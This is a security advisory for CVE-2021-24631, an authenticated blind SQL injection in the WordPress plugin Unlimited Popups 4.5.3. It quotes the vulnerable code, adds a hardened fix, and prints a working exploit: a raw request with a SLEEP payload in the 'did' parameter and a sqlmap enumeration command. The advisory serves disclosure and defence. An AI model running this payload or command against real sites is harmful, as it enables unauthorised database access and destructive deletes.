Wp Plugin Unlimited Popups

Plugin Details

Plugin Name: wp-plugin : unlimited-popups
Affected Version : 4.5.3 (and most probably lower versions, if any)
Vulnerability : SQL Injection (authenticated, time-based blind as demonstrated below)
Minimum Level of Access Required : Editor
CVE Number : CVE-2021-24631
Identified by : Shreya Pohekar
WPScan Reference URL

Disclosure Timeline

Technical Details

The delete popup feature, reachable by the Editor and Administrator roles, reads the GET parameter did and concatenates it straight into a DELETE statement. There is no sanitization, validation, escaping or parameterisation of the value (and no type check, so a non-numeric string is accepted as-is), which lets an authenticated Editor inject arbitrary SQL into the WHERE clause.

Vulnerable Code: popuplist.php#L16

15:    $delid = $_GET["did"];
16:    $wpdb->query("delete from " . $table_name . " where id=" . $delid);
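For contrast with the two lines above, here is a hardened form of the same delete handler. This is an added example written for this page, not the plugin's own code or its vendor's fix: the variable names $table_name and $delid are taken from the vulnerable snippet, while the nonce action name, the capability used for the authorisation check, the table name and the redirect target are assumptions made for the illustration.

```php
<?php
// Added example, not the plugin's code: hardened version of the delete handler.
// Assumptions: the table is plugin-owned and named from $wpdb->prefix, Editor
// and Administrator (who hold 'edit_others_posts') are the intended users, and
// the list page emits a nonce with action 'unlimited_popups_delete_<id>'.

global $wpdb;
$table_name = $wpdb->prefix . 'popups'; // assumption: never derived from user input

// Only handle the delete action of this admin page.
if ( isset( $_GET['info'] ) && 'del' === $_GET['info'] ) {

    // Authorisation: require a capability, not merely a logged-in session.
    if ( ! current_user_can( 'edit_others_posts' ) ) {
        wp_die( esc_html__( 'You are not allowed to delete popups.', 'unlimited-popups' ),
                '', array( 'response' => 403 ) );
    }

    // Input validation: the id must be a positive integer. absint() reduces a
    // payload such as "1 AND (SELECT ...)" to 1, so nothing else reaches SQL.
    $delid = isset( $_GET['did'] ) ? absint( wp_unslash( $_GET['did'] ) ) : 0;
    if ( 0 === $delid ) {
        wp_die( esc_html__( 'Invalid popup id.', 'unlimited-popups' ),
                '', array( 'response' => 400 ) );
    }

    // CSRF protection: the delete link must carry a nonce bound to this id.
    check_admin_referer( 'unlimited_popups_delete_' . $delid );

    // Parameterised query. %d forces an integer placeholder. Identifiers cannot
    // be placeholders, which is why the table name must not be user-controlled.
    $rows = $wpdb->query(
        $wpdb->prepare( "DELETE FROM {$table_name} WHERE id = %d", $delid )
    );
    // Equivalent shorthand:
    // $wpdb->delete( $table_name, array( 'id' => $delid ), array( '%d' ) );

    if ( false === $rows ) {
        wp_die( esc_html__( 'Delete failed.', 'unlimited-popups' ),
                '', array( 'response' => 500 ) );
    }

    wp_safe_redirect( admin_url( 'admin.php?page=popup' ) );
    exit;
}

// The list page has to produce delete links that carry the matching nonce.
function unlimited_popups_delete_link( $id ) {
    $id  = absint( $id );
    $url = admin_url( 'admin.php?page=popup&info=del&did=' . $id );
    return wp_nonce_url( $url, 'unlimited_popups_delete_' . $id );
}
```

The three controls are independent: absint() plus the %d placeholder closes the injection, check_admin_referer() stops a cross-site request from deleting popups on behalf of a logged-in Editor, and current_user_can() documents who may delete at all rather than relying on the menu registration alone.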

PoC Screenshot

unlimited-popups-poc

Exploit

The request below was captured from a lab instance (172.28.128.50) and is shown with the payload URL-decoded; encode the spaces and parentheses before replaying it by hand. Note that the injected statement is a DELETE: if a popup with id 1 exists it is removed on the first successful request, and a boolean payload such as OR 1=1 would empty the table, so test only against a disposable copy of the site.

GET /wp-admin/admin.php?page=popup&info=del&did=1 AND (SELECT 4420 FROM (SELECT(SLEEP(5)))yVXX) HTTP/1.1
Host: 172.28.128.50
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Referer: http://172.28.128.50/wp-admin/admin.php?page=popup
Connection: close
Cookie: wordpress_232395f24f6cff47569f2739c21385d6=admin%7C1623236102%7ChOW4clIDPdi4TBOZiMszSHPdlMTwjn5Ct1f3LKhuUkr%7Cd369b0fc734febbd56e02a2729ea1e89ed8bdef88858aa2bf66244e80af40313; wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_232395f24f6cff47569f2739c21385d6=admin%7C1623236102%7ChOW4clIDPdi4TBOZiMszSHPdlMTwjn5Ct1f3LKhuUkr%7C52b09dc0a0cd88faff03e9a9bce98b1cace6dcf841b17fe668c52d49083ff760; wp-settings-1=editor%3Dtinymce%26libraryContent%3Dbrowse%26posts_list_mode%3Dlist%26mfold%3Do%26widgets_access%3Doff; wp-settings-time-1=1623063303
Upgrade-Insecure-Requests: 1

SQLMap Command

Save the raw request above as popup.req and point sqlmap at it:

sqlmap -r popup.req --dbms mysql --current-user --current-db -b -p did --batch --flush-session

-r reads the whole request (including the session cookies) from the file, -p did restricts testing to the vulnerable parameter, --dbms mysql skips fingerprinting of other back ends, -b prints the server banner, --current-user and --current-db enumerate the database account and schema, --batch answers prompts with defaults, and --flush-session discards any earlier cached results for the target. Because the injection point is inside a DELETE, every true condition sqlmap sends removes the matching row; restricting it to time-based blind tests with --technique=T keeps the number of destructive requests predictable, and the target should in any case be a throwaway instance.